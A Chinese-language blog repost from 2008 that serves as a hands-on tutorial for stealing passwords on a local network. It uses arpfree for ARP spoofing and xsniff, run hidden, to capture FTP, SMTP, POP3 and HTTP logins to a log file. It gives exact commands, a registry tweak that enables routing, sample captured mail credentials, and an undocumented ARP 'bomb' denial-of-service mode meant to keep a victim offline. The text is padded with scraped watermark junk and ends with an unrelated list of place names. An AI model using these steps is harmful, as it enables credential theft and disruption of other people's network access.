天若有情

          到教堂懺悔,愿主安撫我罪惡的心靈......
          posts - 4, comments - 35, trackbacks - 0, articles - 24

          arpfree + xsniff嗅探局域網密碼

          Posted on 2008-09-13 19:07 freedoom 閱讀(1848) 評論(0)  編輯  收藏 所屬分類: hacker

          arpfree + xsniff嗅探局域網密碼

          試驗環境:
             一臺八口共享上網路由器,接八臺電腦 !在其中一臺機器上嗅探密碼Netexpert網絡分析專家個人空間

          步驟如下:Netexpert網絡分析專家個人空間 LE MB&kr0`
                  1,首先ping 192.168.0.1 網關,然后用arp -a 獲得網關Mac地址 0000ea0123deNetexpert網絡分析專家個人空間
                2,使用arpfree欺騙網關,讓它將其他機器發向網關的包發給嗅探主機
                    命令如下:Netexpert網絡分析專家個人空間pgR4K wO,tG/H
                           arpfree 0000ea0123de 123412341234 request 1.1.1.1 
                  3,啟動sniff開始嗅探
                       命令如下:           
            xsniff -pass -hide -log pass.log 

             4,打開pass.log就能察看嗅探到的密碼!
                示例: 
             TCP  [05/10/06 22:17:40]
          192.168.0.8->202.108.9.77 Port: 1158->80
              HOST: mail.163.com USER: 1111111, PASS: 1111111
          Arpfree + X-Sniff嗅探局域網密碼
          游泳的魚 發表于 2008-1-14 15:48:00
           
          0
          ARP簡介:

          要使用ARP欺騙,必須啟動ip路由功能,修改(添加)注冊表選項:
          HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1

          發送ARP報文的軟件,可以發送任意 源,目的 地址的ARP報文,可以結合Sniffer做不少的事~不用老在Sniffer里做ARP包了~

          不過要安裝WinPacp 3.0驅動先...

          發送的時候可以選擇ARP的TYPE。如果是ARP請求報文,則只要輸入要訪問的IP地址。

          如果是ARP應答報文則要輸入發送端的IP以及對方詢問MAC地址對應的IP地址

          最后的發送速度可選參數為:(大小寫敏感..我覺得挺不好的)

          fast---------最快
          hear---------每60ms一個包(可能是比較適合結合Sniffer做監聽)
          slowhear-----每500ms一個包
          auto---------每1秒一個包
          slow---------每2秒個包

          使用方法如下:

          ***********************************************************************
          (1)Send arp packet in "request mode"  Examples:           
            arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast     
                   |      |     |   |  |      
                你的網卡地址    |     |   |  |      
                       對方網卡地址   |   | 速度     
                             arp方式   |         
                                   |         
                                你的IP地址       
          ***********************************************************************
          (2)Send arp packet in "reply mode"  Examples:                     
              arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto   
                  |      |    |   |   |  |      
               你的網卡地址    |    |   |   |  |      
                      對方網卡地址  |   |   |  速度     
                           arp方式   |   |      
                                 |   |      
                              你的IP地址  |      
                                    |           
                                   對方IP地址       
          ***********************************************************************


          反擊“Lan終結者”的辦法:

          1:發動比他更強烈的攻擊:

          arpfree 0050fc272b26 ffffffffffff request 1.1.1.1 fast     
                 |     |    |   |  |      
              你的網卡地址   |    |   |  |      
                   對方網卡地址 |   | 速度     
                        arp方式  |         
                              |         
                           你的IP地址       
          2:交換機競爭:
          arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
                 |      |     |   |   |      
              你的網卡地址    |     |   |   |      
                 你想攻擊的人的網卡地址  |   |   速度     
                          arp方式    |         
                                 |         
                             你的IP地址       

          方法1將導致他IP地址沖突(比“終結者”來的猛烈多了)

          方法2將使得他無法連接網絡(由于交換機把他的流量都給你了)

          ***********************************************************************

          因為有朋友反映在非交換環境下,如使用HUB的情況下,無法對目標進行打擊

          故增加參數“bomb”,使用方法如下:

          假設目標為IP:192.168.237.109 目標mac為:011a8575a436

          攻擊命令如下:

          arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb

          其實就是進行簡單的ARP DOS攻擊,快速刷新目標的ARP緩存,可以在消耗自身較少系統資源的情況下

          造成和PDOS工具類似的效果,并且如果你不停止攻擊,對方重啟以后也無法正常進入系統

          (當然前提是他沒拔網線)。

          其實這樣做是十分不厚道的....所以參數就沒有寫在程序的 HELP 里面,大家慎用...


          =========================================================================

          X-Sniff嗅探器

          可捕獲局域網內FTP/SMTP/POP3/HTTP協議密碼

          參數說明 
          -tcp 輸出TCP數據報 
          -udp 輸出UDP數據報 
          -icmp 輸出ICMP數據報 
          -pass 過濾密碼信息 
          -hide 后臺運行 
          -host 解析主機名 
          -addr IP地址 過濾IP地址 
          -port 端口 過濾端口 
          -log 文件名 將輸出保存到文件 
          -asc 以ASCII形式輸出 
          -hex 以16進制形式輸出 
          用法示例 
          xsniff.exe -pass -hide -log pass.log 后臺運行嗅探密碼并將密碼信息保存在pass.log文件中 
          xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并過濾tcp和udp信息并以ASCII格式輸出.


          ==========================================================================

          實驗開始...

          試驗環境:

              一臺八口共享上網路由器,接八臺電腦,在其中一臺機器上嗅探密碼

          步驟如下:

              1.首先ping 192.168.0.1 網關,然后用arp -a 獲得網關Mac地址 0000ea0123de
              2.使用arpfree欺騙網關,讓它將其他機器發向網關的包發給嗅探主機  命令如下:
                arpfree 0000ea0123de 123412341234 request 1.1.1.1 hear
              3.啟動X-Sniff開始嗅探  命令如下:
                xsniff -pass -hide -log pass.log
              4.打開pass.log就能察看嗅探到的密碼!

          示例:
              TCP  [05/10/06 22:17:40]
              192.168.0.8->202.108.9.77 Port: 1158->80
              HOST: mail.163.com USER: 1111111, PASS: 1111111

          如果是非交換環境,可省略1,2步。

          面提到的xsniff.exe 十分小巧,但是功能強大,呵呵呵!
          0使用說明 請看下面的

          可捕獲局域網內FTP/SMTP/POP3/HTTP協議密碼
          參數說明  

          輸出TCP數據報  
          -udp 輸出UDP數據報  
          -icmp 輸出ICMP數據報  
          -pass 過濾密碼信息  
          -hide 后臺運行  
          -host 解析主機名 
          -addr IP地址 過濾IP地址  
          -port 端口 過濾端口  
          -log 文件名 將輸出保存到文件  
          -asc 以ASCII形式輸出  
          -hex 以16進制形式輸出  Netexpert網絡分析專家個人空間!E x"vM/LEu
          用法示例  
          xsniff.exe -pass -hide -log pass.log 后臺運行嗅探密碼并將密碼信息保存在pass.log文件中  
          xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并過濾tcp和udp信息并以ASCII格式輸出.
          上面提到的arpfree工具使用說明請看 url]http://www.netexpert.cn/viewthread.php?tid=550[/url]Netexpert網絡分析專家個人空間Zw+^9GqCZ
          Netexpert網絡分析專家個人空間0K:Tz#@O)A0cc
          [ 本帖最后由 diker 于 2006-5-11 12:14 編輯 ]Netexpert網絡分析專家個人空間t,[$BWSmu:Y
          主站蜘蛛池模板: 武陟县| 武威市| 云梦县| 韶关市| 客服| 永春县| 工布江达县| 昌宁县| 庆阳市| 河曲县| 顺义区| 偏关县| 壶关县| 太原市| 兰州市| 若尔盖县| 望城县| 来凤县| 铜鼓县| 两当县| 中方县| 新河县| 乐至县| 于都县| 伊宁县| 龙川县| 甘肃省| 丹阳市| 安多县| 印江| 台安县| 湛江市| 石泉县| 繁峙县| 沭阳县| 孝义市| 藁城市| 且末县| 金塔县| 会东县| 独山县|